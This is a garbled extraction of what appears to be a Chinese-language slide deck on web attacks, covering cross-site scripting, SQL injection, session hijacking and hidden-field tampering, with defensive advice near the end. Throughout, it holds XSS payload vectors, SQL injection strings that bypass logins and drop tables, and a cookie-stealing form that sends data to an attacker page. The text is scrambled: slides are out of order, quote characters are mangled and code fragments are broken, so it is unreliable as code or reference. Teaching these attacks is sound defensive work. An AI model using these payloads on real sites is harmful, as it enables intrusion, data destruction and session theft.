【正文】 u %2B= (0x0067)。 u %2B= (0x0063)。url=javascript:[code] body onload=[code] div style=backgroundimage: url(javascript:[code])。 /SCRIPT 阻擋 CrossSite Scripting攻擊的錯(cuò)誤方法 檢查使用者輸入的資料是否內(nèi)含 和 無法防範(fàn)以下的攻擊 : script language=JScript RUNAT=Server var strUserName = (Name)。 And Password=39。foo39。John39。 AND Password =39。)— 權(quán)限足夠的狀況下 , 在 [帳號(hào) ]欄位輸入以下的資料就可以刪除 Members資料表 : 39。ABC39。 /script img src= onmouseover=39。 div style=behaviour: url([link to code])。u %2B= (0x006B)。u %2B= (0x0069)。u %2B= (0x0063)。u %2B= (0x0061)。 link rel=stylesheet href=javascript:[code] iframe src=vbscript:[code] img src=mocha:[code] 各種 CrossSite Scripting攻擊方法 (二 ) img src=livescript:[code] a href=about:s ript[code]/script meta equiv=refresh content=0。 ()。John39。, 39。 網(wǎng)頁攻擊手法與受害原因 Crosssite Scripting(XSS) 受害原因 :未對(duì)使用者輸入的資料執(zhí)行編碼處理 SQL Injection 受害原因 :利用使用者輸入的資料組成 SQL敘述 Session Hijacking 受害原因 :SessionID被猜中或 SessionID Cookie被竊 Oneclick 受害原因 :使用 Script傳送 HTTP Post Hidden Field tampering 受害原因 :未對(duì)網(wǎng)頁中隱藏欄位的內(nèi)容做檢查 SQL Injection攻擊法 SQL Injection攻擊模式 ?入侵登入畫面 ?植入帳號(hào) ?刪除資料表 ?偷取資料表資訊 ?修改資料表記錄 入侵登入畫面 欲執(zhí)行的 SQL敘述 SELECT count(*) FROM Members WHERE UserName = 39。ABC39。drop table Members 不需要密碼也可以登入 在 [密碼 ]欄位輸入以下的資料就可以成功登入 : aaa39。 使用者在 UserName欄位輸入 [39。doWork(%=strUserName%)。 div style=binding: url([link to code])。 u %2B= (0x0065)。 u %2B= (0x003F)。 u %2B= (0x002E)。 u %2B= (0x0074)。 img src={[code]}。/script.../a 取得超連結(jié)網(wǎng)址 的 Cookie 誘騙點(diǎn)選的危險(xiǎn)郵件 目標(biāo)網(wǎng)站 透過中間網(wǎng)頁傳送 Cookie到駭客的網(wǎng)頁 FORM action= method=post id=idForm INPUT name=cookie type=hidden /FORM SCRIPT =。) and colid=1 欄 位 名 稱 修改資料表記錄 在網(wǎng)址列輸入 : update Products set UnitPrice=1 Where ProductID=1 防堵 SQL Injection攻擊的基本原則 (一 ) 將使用者輸入資料當(dāng)做參數(shù)傳給 SQL敘述或 Stored Procedure ?SQL敘述或是 Stored Procedure中使用 EXEC敘述執(zhí)行使用者輸入的內(nèi)容需更進(jìn)一步防範(fàn) 如果無法將使用者輸入資料當(dāng)做參數(shù)傳給 SQL敘述或 Stored Procedure ?使用 Regular Expression驗(yàn)証使用者輸入的資料的格式 ?限制使用者輸入的資料的長度 ?限制使用者登入資料庫的帳號(hào)的權(quán)限 ?去除使用者輸入資料中的 ―‖(SQL敘述的註解 ) ?將使用者輸入的單引號(hào)置換成雙引號(hào) 將使用者輸入的單引號(hào)置換成雙引號(hào)的效果 例如原本欲執(zhí)行的 SQL敘述為 : Select count(*) from Members where UserName=39。hacker39。 Information disclosure 網(wǎng)站執(zhí)行發(fā)生例外時(shí)讓網(wǎng)站的使用者看到例外的詳細(xì)資訊。 直接入侵 不良的 SQL敘述寫法 SELECT count(*) FROM Members WHERE UserName =39。 Or UserName Like 39。 Or 1=1 ] ?未將使用者輸入的單引號(hào)置換成雙引號(hào) , 上述的 SQL敘述執(zhí)行的結(jié)果為 Members資料表的 總筆數(shù) ?將使用者輸入的單引號(hào)置換成雙引號(hào) , 上述的 SQL敘述執(zhí)行的結(jié)果為 0 防堵 SQL Injection攻擊的基本原則 (二 ) 限制應(yīng)用程式或網(wǎng)頁只能擁有執(zhí)行 Stored Procedure的權(quán)限 , 不能直接存取資料庫中的 Table和 View 使用 [Windows整合安全模式 ]登入資料庫 , 避免使用系統(tǒng)管理員身份登入資料庫 設(shè)定 TextBox欄位的 MaxLength屬性 加強(qiáng)對(duì)資料庫操作的稽核 Hidden F